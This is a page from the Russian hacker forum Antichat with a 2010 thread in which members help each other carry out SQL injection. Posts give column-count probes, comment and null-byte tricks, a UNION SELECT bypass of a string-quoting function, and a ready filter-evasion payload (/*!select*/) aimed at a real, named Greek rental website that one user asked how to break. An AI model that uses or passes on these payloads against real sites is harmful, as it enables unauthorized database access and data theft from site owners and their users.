ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12651  
Старый 20.04.2010, 21:40
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от YuNi|[c  
привет посоветуйте как тут поступит:
на запрос localhost/script.php?id=1'+order+by+1+--+

ответ:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near 'order+by+1+--+', now())'
at line 2
вот никак не могу раскрутит еще добавка now())'

localhost/script.php?id=1'%20order%20by%201--
 
Ответить с цитированием

  #12652  
Старый 20.04.2010, 22:34
Аватар для YuNi|[c
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

спс попугай но все еще остался now())

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '', now())' at line 2
 
Ответить с цитированием

  #12653  
Старый 21.04.2010, 01:22
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от YuNi|[c  
спс попугай но все еще остался now())

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '', now())' at line 2

попробуй пробелы поставить до и\или после двух тире, либо /* заюзай, или нульбайтом отрежь на крайний случай.

А вообще, похоже ошибка идет во втором запросе, видимо.
 
Ответить с цитированием

  #12654  
Старый 21.04.2010, 07:53
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

%23, #, /*.
1' order by 1,2,3,4,5,6,7,8,9,10,11,12 /*
1 order by 1,2,3,4,5,6,7,8,9,10,11,12 /*
С ковычкой без и т.п.
 
Ответить с цитированием

  #12655  
Старый 21.04.2010, 11:59
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

99% что это инсерт или апдейт. Крутить соответственно
 
Ответить с цитированием

  #12656  
Старый 21.04.2010, 14:07
Аватар для slayzer
slayzer
Новичок
Регистрация: 30.04.2009
Сообщений: 9
Провел на форуме:
35489

Репутация: 0
По умолчанию

Господа, есть варианты обхода экранирования ?)


statement := 'SELECT * FROM users WHERE name = ' + QuoteParam(userName) + ';';


function QuoteParam(s : string) : string;
{ на входе — строка; на выходе — строка в кавычках и с заменёнными спецсимволами }
var
i : integer;
Dest : string;
begin
Dest := '"';
for i:=1 to length(s) do
case s[i] of
'''' : Dest := Dest + '\''';
'"' : Dest := Dest + '\"';
'\' : Dest := Dest + '\\';
else Dest := Dest + s[i];
end;
QuoteParam := Dest + '"';
end;


+ к переменной можно добавить intval()
 
Ответить с цитированием

  #12657  
Старый 21.04.2010, 14:10
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Как бы там кавычки не мешаються, name= dasjkhasdjkhsjkhasdkhkajh union select 1, etc...
 
Ответить с цитированием

  #12658  
Старый 21.04.2010, 18:55
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

как можно обойти фильтрацию на select? полей 4

http://www.alpharent.gr/gr/offers.php?id=1
 
Ответить с цитированием

  #12659  
Старый 21.04.2010, 19:12
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

pinch:
Цитата:
http://www.alpharent.gr/gr/offers.php?id=-1+union+/*!select*/+0,1,2,3
 
Ответить с цитированием

  #12660  
Старый 21.04.2010, 19:29
Аватар для GOGA075
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

Какой функцией нужно делать поиск по БД?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ